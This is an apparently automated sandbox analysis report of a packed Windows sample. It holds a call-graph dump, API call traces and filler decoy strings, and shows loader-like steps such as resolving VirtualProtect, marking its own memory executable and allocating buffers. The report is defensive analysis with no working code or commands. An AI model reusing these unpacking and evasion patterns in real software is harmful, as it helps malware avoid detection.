b3578d 9140->9142 9146 b35840 _CrtMemDumpAllObjectsSince_stat 43 API calls 9141->9146 9148 b35840 _CrtMemDumpAllObjectsSince_stat 43 API calls 9142->9148 9142->9149 9144 b35734 9143->9144 9145 b35708 IsBadReadPtr 9143->9145 9150 b35840 9144->9150 9145->9144 9145->9149 9146->9149 9148->9149 9160 b357fa 9149->9160 9153 b3585e __chvalidator_l 9150->9153 9151 b3598b _LocaleUpdate::~_LocaleUpdate 9152 b3a1a0 ___crtMessageWindowW 5 API calls 9151->9152 9154 b359da 9152->9154 9153->9151 9156 b358da __chvalidator_l 9153->9156 9163 b3a080 9153->9163 9154->9149 9167 b39f70 9156->9167 9158 b3595d 9158->9151 9159 b359e0 __invoke_watson_if_oneof 10 API calls 9158->9159 9159->9151 9182 b37dc0 LeaveCriticalSection 9160->9182 9162 b35801 9162->9136 9164 b3a094 __chvalidator_l __isleadbyte_l 9163->9164 9165 b3b770 ___crtLCMapStringW 3 API calls 9164->9165 9166 b3a0a3 _LocaleUpdate::~_LocaleUpdate __chvalidator_l 9164->9166 9165->9166 9166->9156 9170 b3e120 9167->9170 9169 b39f93 9169->9158 9171 b3e141 9170->9171 9172 b3e168 9171->9172 9174 b3e199 9171->9174 9173 b381d0 __invalid_parameter 11 API calls 9172->9173 9179 b3e18e _memset 9173->9179 9175 b3e219 9174->9175 9176 b3e1e8 9174->9176 9177 b3df30 __vsnprintf_helper 40 API calls 9175->9177 9178 b381d0 __invalid_parameter 11 API calls 9176->9178 9180 b3e237 _memset 9177->9180 9178->9179 9179->9169 9180->9179 9181 b381d0 __invalid_parameter 11 API calls 9180->9181 9181->9179 9182->9162 9085 b322d0 SetUnhandledExceptionFilter 8686 b459d0 8687 b45a25 8686->8687 8688 b45ab4 8687->8688 8689 b45a6e 8687->8689 8690 b45af6 8688->8690 8705 b45b3c _get_int_arg __chvalidator_l _strlen __isleadbyte_l 8688->8705 8691 b381d0 __invalid_parameter 11 API calls 8689->8691 8692 b381d0 __invalid_parameter 11 API calls 8690->8692 8694 b45a94 _LocaleUpdate::~_LocaleUpdate 8691->8694 8692->8694 8693 b3a1a0 ___crtMessageWindowW 5 API calls 8696 b46ab8 8693->8696 8694->8693 8695 b469ea 8695->8694 8697 b381d0 __invalid_parameter 11 API calls 8695->8697 8697->8694 8698 b45c64 8699 b381d0 __invalid_parameter 11 API calls 8698->8699 8699->8694 8700 b4640c DecodePointer 8700->8705 8701 b46c60 42 API calls _write_string 8701->8705 8702 b46456 DecodePointer 8702->8705 8703 b46c20 42 API calls _write_multi_char 8703->8705 8704 b4648c DecodePointer 8704->8705 8705->8695 8705->8698 8705->8700 8705->8701 8705->8702 8705->8703 8705->8704 8706 b46d20 MultiByteToWideChar MultiByteToWideChar __mbtowc_l 8705->8706 8707 b46bc0 42 API calls _write_char 8705->8707 8706->8705 8707->8705 8366 b28458 8367 b28461 8366->8367 8368 b29790 8367->8368 8371 b28310 8367->8371 8372 b28338 8371->8372 8373 b2831f 8371->8373 8373->8372 8374 b28328 ResetEvent CloseEventLog 8373->8374 8374->8372 8162 b29d5e LocalAlloc 8163 b2b00f 8162->8163 8163->8163 9303 b28340 9304 b2837f 7 API calls 9303->9304 9306 b28418 9303->9306 9304->9306 9305 b29790 9306->9305 9307 b28310 2 API calls 9306->9307 9308 b28472 9307->9308 8149 b33340 GetStartupInfoW 8150 b33367 8149->8150 8151 b335ff 8150->8151 8159 b33373 8150->8159 8160 b3359f InitializeCriticalSectionAndSpinCount 8150->8160 8161 b3358f GetFileType 8150->8161 8152 b3373c SetHandleCount 8151->8152 8153 b33664 GetStdHandle 8151->8153 8155 b336f9 8151->8155 8152->8159 8154 b3367b 8153->8154 8153->8155 8154->8155 8156 b33685 GetFileType 8154->8156 8155->8152 8156->8155 8157 b33698 InitializeCriticalSectionAndSpinCount 8156->8157 8157->8155 8157->8159 8160->8150 8160->8159 8161->8150 8161->8160 8141 b31fc0 8144 b322f0 8141->8144 8143 b31fca 8145 b32312 8144->8145 8146 b32331 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 8144->8146 8145->8146 8147 b3231e 8145->8147 8148 b32393 8146->8148 8147->8143 8148->8147 9110 b3a240 9111 b3a252 9110->9111 9112 b3a260 @_EH4_CallFilterFunc@8 9110->9112 9113 b3a1a0 ___crtMessageWindowW 5 API calls 9111->9113 9113->9112 8708 b321c0 8709 b321d3 8708->8709 8710 b321ce 8708->8710 8712 b364d0 __NMSG_WRITE 31 API calls 8709->8712 8711 b36430 __FF_MSGBANNER 31 API calls 8710->8711 8711->8709 8713 b321dc 8712->8713 8714 b328a0 __heap_alloc_base 3 API calls 8713->8714 8715 b321e9 8714->8715 8761 b3f140 8764 b453e0 8761->8764 8767 b45420 8764->8767 8768 b3f155 8767->8768 8769 b45431 std::exception::_Tidy 8767->8769 8769->8768 8770 b454c0 std::exception::_Copy_str 11 API calls 8769->8770 8770->8768 8771 b35d40 8772 b35d4e DecodePointer 8771->8772 8773 b35d63 8771->8773 8772->8773 8774 b35d76 TlsFree 8773->8774 8775 b35d8d 8773->8775 8774->8775 8778 b37b70 8775->8778 8779 b37b81 8778->8779 8781 b37baa DeleteCriticalSection 8779->8781 8782 b37bdf 8779->8782 8780 b35d92 8781->8779 8782->8780 8783 b37c11 DeleteCriticalSection 8782->8783 8783->8782 9193 b35fc0 9194 b36002 9193->9194 9202 b36193 9193->9202 9195 b360f5 InterlockedDecrement 9194->9195 9196 b36103 9194->9196 9195->9196 9203 b36128 9196->9203 9198 b36126 9199 b3615c ___freetlocinfo 9198->9199 9200 b39a10 ___removelocaleref 8 API calls 9198->9200 9206 b36195 9199->9206 9200->9199 9209 b37dc0 LeaveCriticalSection 9203->9209 9205 b3612f 9205->9198 9210 b37dc0 LeaveCriticalSection 9206->9210 9208 b3619c 9208->9202 9209->9205 9210->9208 8784 b43540 8789 b47880 8784->8789 8787 b4355a 8799 b478a0 8789->8799 8792 b47630 8798 b47670 8792->8798 8793 b4772a 8875 b47738 8793->8875 8797 b476e8 DeleteCriticalSection 8797->8798 8798->8793 8798->8797 8864 b47ea0 8798->8864 8800 b478e7 8799->8800 8809 b479e5 8800->8809 8812 b435d0 8800->8812 8804 b47954 8805 b4799f 8804->8805 8806 b4797a 8804->8806 8811 b4798c 8804->8811 8810 b47760 __fflush_nolock 44 API calls 8805->8810 8805->8811 8815 b47760 8806->8815 8828 b47a14 8809->8828 8810->8811 8825 b479e7 8811->8825 8813 b435fe EnterCriticalSection 8812->8813 8814 b435db 8812->8814 8813->8814 8814->8804 8816 b47777 8815->8816 8817 b4776b 8815->8817 8831 b477c0 8816->8831 8819 b478a0 __fflush_nolock 44 API calls 8817->8819 8824 b47772 8819->8824 8821 b436b0 __fileno 11 API calls 8822 b477a3 8821->8822 8837 b480b0 8822->8837 8824->8811 8857 b43670 8825->8857 8863 b37dc0 LeaveCriticalSection 8828->8863 8830 b4354a 8830->8787 8830->8792 8832 b477e3 8831->8832 8836 b47780 8831->8836 8833 b436b0 __fileno 11 API calls 8832->8833 8832->8836 8834 b47819 8833->8834 8835 b424e0 __write 40 API calls 8834->8835 8835->8836 8836->8821 8836->8824 8838 b480fb 8837->8838 8846 b480e8 8837->8846 8839 b4814c 8838->8839 8840 b4817a 8838->8840 8844 b381d0 __invalid_parameter 11 API calls 8839->8844 8841 b481f5 8840->8841 8842 b481c7 8840->8842 8843 b474b0 ___lock_fhandle 3 API calls 8841->8843 8847 b381d0 __invalid_parameter 11 API calls 8842->8847 8845 b481fe 8843->8845 8844->8846 8848 b47340 __get_osfhandle 11 API calls 8845->8848 8852 b4824a __close 8845->8852 8846->8824 8847->8846 8849 b48231 FlushFileBuffers 8848->8849 8850 b4823f GetLastError 8849->8850 8849->8852 8850->8852 8853 b482a5 8852->8853 8856 b475b0 LeaveCriticalSection 8853->8856 8855 b482ae 8855->8846 8856->8855 8858 b4369e LeaveCriticalSection 8857->8858 8859 b4367b 8857->8859 8860 b43699 8858->8860 8862 b37dc0 LeaveCriticalSection 8859->8862 8860->8809 8862->8860 8863->8830 8865 b47eeb 8864->8865 8866 b47f0f 8865->8866 8867 b47f3a 8865->8867 8871 b381d0 __invalid_parameter 11 API calls 8866->8871 8868 b47f32 8867->8868 8878 b43570 8867->8878 8868->8798 8870 b47f5a 8882 b47fb0 8870->8882 8871->8868 8873 b47f6d 8893 b47f81 8873->8893 8942 b37dc0 LeaveCriticalSection 8875->8942 8877 b47736 8877->8787 8879 b435b2 EnterCriticalSection 8878->8879 8880 b4357e 8878->8880 8881 b43587 8879->8881 8880->8879 8880->8881 8881->8870 8885 b47fd1 8882->8885 8883 b47ff5 8887 b381d0 __invalid_parameter 11 API calls 8883->8887 8884 b48023 8886 b477c0 __flush 40 API calls 8884->8886 8892 b48018 8884->8892 8885->8883 8885->8884 8888 b48040 __freebuf 8886->8888 8887->8892 8889 b436b0 __fileno 11 API calls 8888->8889 8890 b4805b 8889->8890 8896 b48340 8890->8896 8892->8873 8935 b43610 8893->8935 8897 b48396 8896->8897 8909 b48378 __close 8896->8909 8898 b48420 8897->8898 8900 b483e7 __close 8897->8900 8899 b484a6 8898->8899 8903 b4846d __close 8898->8903 8901 b474b0 ___lock_fhandle 3 API calls 8899->8901 8904 b381d0 __invalid_parameter 11 API calls 8900->8904 8902 b484af 8901->8902 8905 b484e2 8902->8905 8910 b48550 8902->8910 8907 b381d0 __invalid_parameter 11 API calls 8903->8907 8904->8909 8923 b4852c 8905->8923 8907->8909 8909->8892 8911 b47340 __get_osfhandle 11 API calls 8910->8911 8914 b48560 8911->8914 8912 b485c5 8926 b47250 8912->8926 8914->8912 8915 b485a7 8914->8915 8916 b47340 __get_osfhandle 11 API calls 8914->8916 8915->8912 8917 b47340 __get_osfhandle 11 API calls 8915->8917 8918 b4859b 8916->8918 8919 b485b7 CloseHandle 8917->8919 8920 b47340 __get_osfhandle 11 API calls 8918->8920 8919->8912 8921 b485ce GetLastError 8919->8921 8920->8915 8921->8912 8922 b485e0 __dosmaperr 8922->8905 8934 b475b0 LeaveCriticalSection 8923->8934 8925 b48535 8925->8909 8927 b47260 8926->8927 8932 b472d0 __close 8926->8932 8928 b472c4 8927->8928 8929 b472d2 SetStdHandle 8927->8929 8927->8932 8930 b472de SetStdHandle 8928->8930 8931 b472ca 8928->8931 8929->8932 8930->8932 8931->8932 8933 b472ea SetStdHandle 8931->8933 8932->8922 8933->8932 8934->8925 8936 b43652 LeaveCriticalSection 8935->8936 8937 b4361e 8935->8937 8939 b4364d 8936->8939 8937->8936 8938 b43627 8937->8938 8941 b37dc0 LeaveCriticalSection 8938->8941 8939->8868 8941->8939 8942->8877

                                                            Executed Functions

                                                            Function 00B31E90 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 66sleeplibraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 b31e90-b31ee4 1 b31ef2-b31f3f 0->1 2 b31ee6-b31ef0 0->2 4 b31f9a-b31fad LoadLibraryW Sleep call b306f0 1->4 2->1 3 b31f41-b31f93 2->3 3->4 6 b31fb2-b31fb7 4->6
                                                            APIs
                                                            • LoadLibraryW.KERNELBASE(msimg32.dll), ref: 00B31F9F
                                                            • Sleep.KERNELBASE(0000000F), ref: 00B31FA7
                                                            Strings
                                                            • Tofoc, xrefs: 00B31F8C
                                                            • Kadiquap yak yapese gicihe caf wokatixa, xrefs: 00B31EF9
                                                            • Lopaga boko totin quovite nat nijati caxebi, xrefs: 00B31F1F
                                                            • Taveni wekaw nedowogi toh ketelo yiyero bopix nig lexakesi, xrefs: 00B31EC3
                                                            • msimg32.dll, xrefs: 00B31F9A
                                                            • Saqua xogakoga hitomigi baq ridihi xiwik gon, xrefs: 00B31F78
                                                            • Kewiwali tineq hoki kahe quo xexiqua, xrefs: 00B31EF2
                                                            • Golimafo nedofa cej goy koci woben tikavi, xrefs: 00B31F93
                                                            • Yoka kalex jeh goror, xrefs: 00B31EBC
                                                            • Menif dina lebi tijijebi docoye delivev rotoxor halofa fijac, xrefs: 00B31ED3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoadSleep
                                                            • String ID: Golimafo nedofa cej goy koci woben tikavi$Kadiquap yak yapese gicihe caf wokatixa$Kewiwali tineq hoki kahe quo xexiqua$Lopaga boko totin quovite nat nijati caxebi$Menif dina lebi tijijebi docoye delivev rotoxor halofa fijac$Saqua xogakoga hitomigi baq ridihi xiwik gon$Taveni wekaw nedowogi toh ketelo yiyero bopix nig lexakesi$Tofoc$Yoka kalex jeh goror$msimg32.dll
                                                            • API String ID: 2118945035-2037848005
                                                            • Opcode ID: 2d531f41cbf00890d6c32676c86e4372f5b2ba4d7de6a79e3e7c507f4828d0c6
                                                            • Instruction ID: 8be7f4e9892d54e6f3be1c1e3298dd7b339f3118e3c11037615d587dfd61950a
                                                            • Opcode Fuzzy Hash: 2d531f41cbf00890d6c32676c86e4372f5b2ba4d7de6a79e3e7c507f4828d0c6
                                                            • Instruction Fuzzy Hash: 3D315E70C19259CADB00DFE8D5492EFBBF0EF54305F1094A8D108BB291EBB90B84CB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00B2F410 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 53librarymemoryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 7 b2f410-b2f454 GetProcAddress 8 b2f45a-b304ad 7->8 9 b30679-b30683 7->9 8->9 11 b30685-b306a8 9->11 12 b306aa-b306c8 9->12 13 b306cf-b306e5 VirtualProtect call b2ddf0 11->13 12->13 16 b306ea-b306ed 13->16
                                                            APIs
                                                            • GetProcAddress.KERNEL32(761A0000,VirtualProtect), ref: 00B2F445
                                                            • VirtualProtect.KERNELBASE(00B48720,000E93B5,00000040,?), ref: 00B306DF
                                                            Strings
                                                            • Hiheb binihoye powisaw xobi, xrefs: 00B2F42E
                                                            • Joj jegal diq ritigipe debaw wovireko fitati sojofi hox wayi getog, xrefs: 00B30685
                                                            • Balafe nod, xrefs: 00B2F423
                                                            • Rexobey famiwi gope hipofaxa hac, xrefs: 00B306C8
                                                            • Tedojade noverore ceyoho wiy xafela xit canav, xrefs: 00B306B6
                                                            • VirtualProtect, xrefs: 00B2F439
                                                            • Vaqueweh, xrefs: 00B3069D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: AddressProcProtectVirtual
                                                            • String ID: Balafe nod$Hiheb binihoye powisaw xobi$Joj jegal diq ritigipe debaw wovireko fitati sojofi hox wayi getog$Rexobey famiwi gope hipofaxa hac$Tedojade noverore ceyoho wiy xafela xit canav$Vaqueweh$VirtualProtect
                                                            • API String ID: 3759838892-90842377
                                                            • Opcode ID: 6f76c6339b18d24ff75cfa1c39efb4014c15e6aba3997f1034590ba370f24ec7
                                                            • Instruction ID: fc90655ef2fef0d7006b26cb382d8c88827f5d3e77514dcd34382535c1dd6395
                                                            • Opcode Fuzzy Hash: 6f76c6339b18d24ff75cfa1c39efb4014c15e6aba3997f1034590ba370f24ec7
                                                            • Instruction Fuzzy Hash: 0C219F70818298DAEB01EBA8E8497AEBEF5AF11308F1040C8D4047B291D7F50A58D7AA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00B2CAF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 17 b2caf0-b2cb30 call b282c0 GetProcAddress LocalFree 20 b2cfc5 17->20 21 b2d42f 20->21 21->21
                                                            APIs
                                                            • GetProcAddress.KERNEL32(761A0000,LocalFree), ref: 00B2CB18
                                                            • LocalFree.KERNELBASE(02744020), ref: 00B2CB2A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeLocalProc
                                                            • String ID: LocalFree
                                                            • API String ID: 1054450353-1040775051
                                                            • Opcode ID: 53ec078022ad4b0c9a5d95bf003f078a60412de83b663496f1eead183f36e0f0
                                                            • Instruction ID: 8d58d4c4990a917baa7944eb260501569aff8190ddbe6340a9c8558d6d63c01f
                                                            • Opcode Fuzzy Hash: 53ec078022ad4b0c9a5d95bf003f078a60412de83b663496f1eead183f36e0f0
                                                            • Instruction Fuzzy Hash: 71E00AB1126210EB861CDBA9FC85F6E3BEDB7487407255559B20AC3261CF34B8409B65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00B35AD0 Relevance: 1.5, APIs: 1, Instructions: 7COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 22 b35ad0-b35ade RtlEncodePointer
                                                            APIs
                                                            • RtlEncodePointer.NTDLL(00000000,?,00B3290B,?,?,00B35C40), ref: 00B35AD7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: EncodePointer
                                                            • String ID:
                                                            • API String ID: 2118026453-0
                                                            • Opcode ID: 89a2a8d3bdd4108df50ebd0492a4838b26ef67c03faf6578c2a82e9aac1c69e1
                                                            • Instruction ID: 49323de22ac96c4490940e90956eb030d743b2a89d20cace940da571e81a3ced
                                                            • Opcode Fuzzy Hash: 89a2a8d3bdd4108df50ebd0492a4838b26ef67c03faf6578c2a82e9aac1c69e1
                                                            • Instruction Fuzzy Hash: E9A0123104424C63C21016966809B523A0CC3C0A32F000011F10C021404D5154414055
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00B31FC0 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 23 b31fc0-b31fc5 call b322f0 25 b31fca call b32000 23->25
                                                            APIs
                                                            • ___security_init_cookie.LIBCMTD ref: 00B31FC5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: ___security_init_cookie
                                                            • String ID:
                                                            • API String ID: 3657697845-0
                                                            • Opcode ID: 10aa842220d1ae97c82873596692f60cc5af0d811702c0041fe5b51822d43d2c
                                                            • Instruction ID: cd9c6fa5229b7b2913188b7eee77e83e6a0bc4f56e751db1b896e957bdbe840c
                                                            • Opcode Fuzzy Hash: 10aa842220d1ae97c82873596692f60cc5af0d811702c0041fe5b51822d43d2c
                                                            • Instruction Fuzzy Hash: BBA0027100464826116833A60D17A1B75CE49C1710FB540907518021071C64A94590A6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00B297E6 Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 27 b297e6-b297eb 28 b29818-b29829 27->28 29 b297ed-b297f7 27->29 32 b298c1 28->32 33 b29d64-b29d73 LocalAlloc 28->33 30 b297fa-b299a7 29->30 31 b2977d-b29782 29->31 41 b29bf3 30->41 34 b29784-b297af 31->34 35 b2970f-b29711 31->35 38 b29b47 32->38 37 b2b00f 33->37 34->32 35->31 37->37 41->41
                                                            APIs
                                                            • LocalAlloc.KERNELBASE(00000040,?), ref: 00B29D6A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: AllocLocal
                                                            • String ID:
                                                            • API String ID: 3494564517-0
                                                            • Opcode ID: 12759f8a02a33d999778be81645607cd66a46a60ac0140e5043cb831fd0ea93d
                                                            • Instruction ID: cf4ae3afe581e2d623e533a8764e55a205607107633e6d00084e0aad754c8592
                                                            • Opcode Fuzzy Hash: 12759f8a02a33d999778be81645607cd66a46a60ac0140e5043cb831fd0ea93d
                                                            • Instruction Fuzzy Hash: 7501BD3080C276E7C7158B18F8C9AB27FE8DB02360F2003D9E5AEAF595D3302505A312
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00B2980D Relevance: 1.3, APIs: 1, Instructions: 17memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 42 b2980d-b29d73 LocalAlloc 44 b2b00f 42->44 44->44
                                                            APIs
                                                            • LocalAlloc.KERNELBASE(00000040,?), ref: 00B29D6A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: AllocLocal
                                                            • String ID:
                                                            • API String ID: 3494564517-0
                                                            • Opcode ID: 5763525157c9af74562bc5ec1667a25c374f8ca3a72bfaf80d8df7f7b0acff5c
                                                            • Instruction ID: c21158c100e73684eeb91486f4d22567e35e3a87aa695523240dd804d3856da9
                                                            • Opcode Fuzzy Hash: 5763525157c9af74562bc5ec1667a25c374f8ca3a72bfaf80d8df7f7b0acff5c
                                                            • Instruction Fuzzy Hash: B3E0C2B0408755EBC7208B50E989A677BF5AB08340F2045DD929AAB141CA706580F755
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00B29D5E Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 45 b29d5e-b29d73 LocalAlloc 46 b2b00f 45->46 46->46
                                                            APIs
                                                            • LocalAlloc.KERNELBASE(00000040,?), ref: 00B29D6A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: AllocLocal
                                                            • String ID:
                                                            • API String ID: 3494564517-0
                                                            • Opcode ID: 4958111e46b0db01031ab94d08d2d317dedb0035050c053ef021dc9506a32ced
                                                            • Instruction ID: 4dad4db2d4ef086c538d10ad40b794aa6d82cd81282e0857a3b88c685e3987b2
                                                            • Opcode Fuzzy Hash: 4958111e46b0db01031ab94d08d2d317dedb0035050c053ef021dc9506a32ced
                                                            • Instruction Fuzzy Hash: B3C08060404315F5D7019B50645BD593960B704300F100595D11552145DA7046419715
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 00B28340 Relevance: 40.3, APIs: 7, Strings: 16, Instructions: 99serviceCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00B28385
                                                            • StrokePath.GDI32(00000000), ref: 00B2838D
                                                            • SetCurrentDirectoryA.KERNEL32(00000000), ref: 00B28395
                                                            • CreateActCtxW.KERNEL32(?), ref: 00B283B9
                                                            • CloseHandle.KERNEL32(?), ref: 00B283D5
                                                            • GetTapeStatus.KERNEL32(00000000), ref: 00B283DD
                                                            • SetCurrentDirectoryA.KERNEL32(00B27AB8), ref: 00B283E7
                                                            Strings
                                                            • Vira yiqu poros kiqu xiborefo lenixed vec, xrefs: 00B2840A
                                                            • Sowaqu xagogici hega mehiyeq kegib vodal wed yihesohe niteco layadome, xrefs: 00B2841F
                                                            • Cibovido nosequop cakiy jivage devicequ xohefeci giti nisam, xrefs: 00B2834D
                                                            • Jeho rotaceto wed kegejaf, xrefs: 00B28434
                                                            • Vas bahotiga, xrefs: 00B2843B
                                                            • Dove, xrefs: 00B29763
                                                            • Geyofe goyabor sihosata bepafem xovaxek, xrefs: 00B2974D
                                                            • Yamadep kepexok kod maneseka, xrefs: 00B283F4
